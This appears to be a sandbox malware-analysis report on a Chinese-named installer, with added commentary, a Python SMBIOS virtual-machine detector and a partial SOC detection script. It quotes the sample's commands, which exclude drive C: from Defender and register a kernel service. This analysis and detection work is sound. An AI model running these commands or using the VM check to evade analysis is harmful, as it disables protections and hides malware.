Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-1K545.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | File created: C:\Users\user\AppData\Local\Temp\is-7TRUA.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | File created: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (identical entry repeated 6 times)
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (identical entry repeated 30 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Window / User API: threadDelayed 6148
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Window / User API: threadDelayed 3678
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Window / User API: threadDelayed 568
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Window / User API: threadDelayed 604
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Window / User API: threadDelayed 510
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1K545.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7TRUA.tmp\update.vac
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1K545.tmp\update.vac
Source: C:\Program Files (x86)\Windows NT\7zr.exe ; Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-7TRUA.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe ; API coverage: 7.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5988 ; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe ; Last function: Thread delayed (28 identical entries)
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Code function: 8_2_6C2DAEC0 FindFirstFileA,FindClose,FindClose
Source: C:\Program Files (x86)\Windows NT\7zr.exe ; Code function: 11_2_00976868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW
Source: C:\Program Files (x86)\Windows NT\7zr.exe ; Code function: 11_2_00977496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW
Source: C:\Program Files (x86)\Windows NT\7zr.exe ; Code function: 11_2_00979C60 GetSystemInfo
Source: #U5b89#U88c5#U52a9#U624b1.0.3.tmp, 00000002.00000002.2223931655.00000000004BC000.00000004.00000020.00020000.00000000.sdmp ; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Process information queried: ProcessInformation

Reading these entries: the FirmwareTableInformation query is NtQuerySystemInformation(SystemFirmwareTableInformation), the call that GetSystemFirmwareTable wraps; the SMBIOS and ACPI tables it returns carry the BIOS vendor, system manufacturer and product strings that identify VMware, VirtualBox, QEMU and Hyper-V guests, which is why the signature is rated as likely VM detection. The delay value 922337203685477 is INT64_MAX in 100-nanosecond units truncated to milliseconds, i.e. an effectively infinite wait timeout; PowerShell's own worker threads produce this entry on most samples, so on its own it is not evidence of an evasion sleep. The memory string is a CD-ROM device-interface path (the GUID is GUID_DEVINTERFACE_CDROM) naming the sandbox's VMware SATA drive, which shows device enumeration rather than a deliberate VM check. Two provenance points are worth keeping: tProtect.dll, later registered as a kernel service, is written by 7zr.exe (the reduced 7-Zip console extractor), so it is carried inside an archive, and update.vac and hrsw.vbc are PE files stored under non-executable extensions.
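The following is an added example, not code from this report or from the sample, showing what the FirmwareTableInformation query above lets a program do: it parses a raw SMBIOS table and looks for hypervisor vendor strings. On Windows the blob comes from GetSystemFirmwareTable('RSMB', ...), which NtQuerySystemInformation(SystemFirmwareTableInformation) backs; here two blobs are constructed inline so the parser runs offline. The marker list and the Type 0 to Type 3 field offsets are my choices, taken from the DMTF SMBIOS layout; the code is not reversed from the sample.

```python
"""Scan a raw SMBIOS table for hypervisor vendor strings.

Added example; not part of the Joe Sandbox report and not the sample's code.
Blobs are constructed below so the parser runs offline.
"""
import struct
from typing import Dict, List, Tuple

VM_MARKERS = ("vmware", "virtualbox", "innotek", "qemu", "kvm", "xen",
              "parallels", "bochs", "virtual machine")

# Structure type -> {field name: offset of its 1-based string index}
STRING_FIELDS = {
    0: {"bios_vendor": 4, "bios_version": 5},
    1: {"manufacturer": 4, "product": 5, "version": 6},
    2: {"board_manufacturer": 4, "board_product": 5},
    3: {"chassis_manufacturer": 4},
}


def parse_structures(table: bytes) -> List[Tuple[int, bytes, List[str]]]:
    """Walk the table: 4-byte header (type, length, handle), `length` bytes
    of formatted data, then NUL-terminated strings ended by an empty string
    (a structure with no strings ends in two NULs)."""
    out = []
    i = 0
    while i + 4 <= len(table):
        stype, length, _handle = struct.unpack_from("<BBH", table, i)
        if length < 4:
            break  # corrupt header; never advance by less than the header
        formatted = table[i:i + length]
        j = i + length
        strings: List[str] = []
        while True:
            end = table.find(b"\x00", j)
            if end < 0:           # unterminated string set: stop here
                j = len(table)
                break
            s = table[j:end]
            j = end + 1
            if not s:
                break
            strings.append(s.decode("latin-1", "replace"))
        if not strings and j < len(table) and table[j] == 0:
            j += 1                # second NUL of an empty string set
        out.append((stype, formatted, strings))
        if stype == 127:          # End-of-Table
            break
        i = j
    return out


def vm_markers(raw: bytes) -> Dict[str, str]:
    """Take a RawSMBIOSData blob (calling method, major, minor, DMI revision,
    DWORD length, then the table) and return each checked field whose text
    contains a hypervisor marker."""
    if len(raw) < 8:
        raise ValueError("blob too short for the RawSMBIOSData header")
    length = struct.unpack_from("<BBBBI", raw, 0)[4]
    table = raw[8:8 + length]
    hits: Dict[str, str] = {}
    for stype, formatted, strings in parse_structures(table):
        for field, off in STRING_FIELDS.get(stype, {}).items():
            if off >= len(formatted):
                continue
            idx = formatted[off]  # 0 means "no string"
            if 1 <= idx <= len(strings):
                value = strings[idx - 1]
                if any(m in value.lower() for m in VM_MARKERS):
                    hits[f"type{stype}.{field}"] = value
    return hits


def build_structure(stype: int, handle: int, fields: bytes, strings: List[str]) -> bytes:
    """Encode one structure; constructed test data, not firmware output.
    `fields` is only the leading part of the formatted area."""
    hdr = struct.pack("<BBH", stype, 4 + len(fields), handle) + fields
    if not strings:
        return hdr + b"\x00\x00"
    return hdr + b"".join(s.encode("latin-1") + b"\x00" for s in strings) + b"\x00"


def build_blob(structures: List[bytes]) -> bytes:
    table = b"".join(structures) + build_structure(127, 0xFFFF, b"", [])
    return struct.pack("<BBBBI", 0, 3, 2, 0, len(table)) + table


# Constructed: the strings a VMware guest typically reports in Type 0/1.
VMWARE_BLOB = build_blob([
    build_structure(0, 0x0000, bytes([1, 2, 0, 0]), ["Phoenix Technologies LTD", "6.00"]),
    build_structure(1, 0x0001, bytes([1, 2, 3, 4]),
                    ["VMware, Inc.", "VMware Virtual Platform", "None", "VMware-42 1a 2b"]),
])
# Constructed: a physical-looking laptop for comparison.
PHYSICAL_BLOB = build_blob([
    build_structure(0, 0x0000, bytes([1, 2, 0, 0]), ["Dell Inc.", "1.12.0"]),
    build_structure(1, 0x0001, bytes([1, 2, 3, 4]), ["Dell Inc.", "Latitude 7420", "Rev 1", "ABC1234"]),
])

if __name__ == "__main__":
    for name, blob in (("vmware", VMWARE_BLOB), ("physical", PHYSICAL_BLOB)):
        print(name, vm_markers(blob))
```

The same parser serves the defender: when hardening a sandbox, these are the SMBIOS fields to rewrite so that a check like this finds nothing, and a Type 1 manufacturer of "VMware, Inc." is exactly what the sample's query would see on the analysis machine this report was produced on.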

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Code function: 8_2_6C163886 NtSetInformationThread 00000000,00000011,00000000,00000000
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Thread information set: HideFromDebugger (2 identical entries)
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Code function: 8_2_6C2F0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Program Files (x86)\Windows NT\7zr.exe ; Code function: 11_2_009F57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Code function: 8_2_6C2F9D35 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Code function: 8_2_6C2F9D66 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Code function: 8_2_6C2EF17D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ; Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Code function: 8_2_6C2E8CBD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Code function: 8_2_6C2F0181 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

The NtSetInformationThread call passes information class 0x11, ThreadHideFromDebugger; once it is set the thread no longer delivers debug events, which is what the two HideFromDebugger entries record. The DebugPort query is NtQueryInformationProcess(ProcessDebugPort), non-zero while a debugger is attached, and the fs:[30h] reads fetch the 32-bit PEB, whose BeingDebugged and NtGlobalFlag fields are the usual next step. Those three are real debugger checks. Weigh the two function pairs at 6C2E8CBD and 6C2F0181 more lightly: IsDebuggerPresent followed by SetUnhandledExceptionFilter, UnhandledExceptionFilter and TerminateProcess is also the shape of the MSVC CRT's __raise_securityfailure (/GS cookie failure) path, and 7zr.exe's GetTickCount/QueryPerformanceCounter function is ordinary timing code, so neither proves a debugger check on its own.

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'" (2 identical entries)
Source: tProtect.dll.14.dr ; Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-S9JIP.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.3.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-VR1CL.tmp\#U5b89#U88c5#U52a9#U624b1.0.3.tmp ; Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe ; Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe ; Process created: C:\Windows\System32\sc.exe sc start CleverSoar (27 identical entries)
Source: C:\Windows\System32\cmd.exe ; Process created: unknown unknown

Two steps matter here. The Inno Setup stub (the .tmp) first excludes the whole C: drive from Microsoft Defender scanning, which covers every file it drops afterwards, then re-runs the installer with /VERYSILENT so the second pass shows no UI. Separately, cmd.exe registers tProtect.dll as an auto-start kernel-mode service named CleverSoar and issues sc start 27 times; that many starts is consistent with the start failing and being retried, but the report does not record the exit codes. A kernel driver delivered as a .dll-named file under Program Files (x86)\Windows NT rather than System32\drivers is a strong detection point in its own right, and the Defender exclusion has no bearing on Driver Signature Enforcement, so whether the driver actually loads depends on its signature. On a suspected host, check Get-MpPreference for the exclusion and the ImagePath under HKLM\SYSTEM\CurrentControlSet\Services\CleverSoar.
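As an added example (mine, not part of the Joe Sandbox report and not the sample's own code), the detection logic a SOC would run over process-creation telemetry for the two commands above. The first two command lines are copied from the report; the other events, the Image/CommandLine field names and the severity labels are constructed assumptions to adapt to your SIEM schema. Because the graph on this page also lists a Sigma hit for the base64-encoded form of the MpPreference cmdlet, the check decodes -EncodedCommand before matching.

```python
"""Flag a Defender path exclusion added via PowerShell (plain or
-EncodedCommand) and a kernel service whose image is not a .sys file under
System32\\drivers.

Added example; not part of the Joe Sandbox report and not the sample's code.
Events are constructed here as minimal process-creation records (Sysmon
Event ID 1 / 4688 style); the field names are an assumption.
"""
import base64
import re
from typing import Dict, List

# Constructed sample: the first two command lines are copied from the report,
# the other three are made up to exercise the encoded and benign paths.
EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "\"powershell.exe\" -Command \"Add-MpPreference -ExclusionPath 'C:\\'\""},
    {"Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r'sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -EncodedCommand " + base64.b64encode(
         "Add-MpPreference -ExclusionPath 'D:\\'".encode("utf-16-le")).decode()},
    {"Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r'sc create AcmeDrv binPath= "C:\Windows\System32\drivers\acmedrv.sys" type= kernel start= demand'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Process"},
]

ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
EXCL_RE = re.compile(r"""-ExclusionPath\s+['"]?([^'"\s,]+)""", re.I)  # first path only
SC_CREATE_RE = re.compile(r"\bsc(?:\.exe)?\s+create\s+(\S+)", re.I)
BINPATH_RE = re.compile(r'binPath=\s*(?:"([^"]+)"|(\S+))', re.I)
TYPE_RE = re.compile(r"\btype=\s*(\S+)", re.I)
DRIVE_ROOT_RE = re.compile(r"^[A-Za-z]:\\?$")


def decode_powershell(cmdline: str) -> str:
    """Inline any -EncodedCommand payload (base64 over UTF-16LE) so the
    cmdlet check sees the same text whether or not it was hidden."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return cmdline[: m.start()] + decoded


def check_defender_exclusion(cmdline: str) -> List[str]:
    """Rate an Add-MpPreference exclusion: a drive root disables scanning
    for everything on that volume, anything narrower still deserves a look."""
    text = decode_powershell(cmdline)
    if "add-mppreference" not in text.lower():
        return []
    out = []
    for path in EXCL_RE.findall(text):
        sev = "critical" if DRIVE_ROOT_RE.match(path) else "high"
        out.append(f"{sev}: Defender exclusion added for {path}")
    return out


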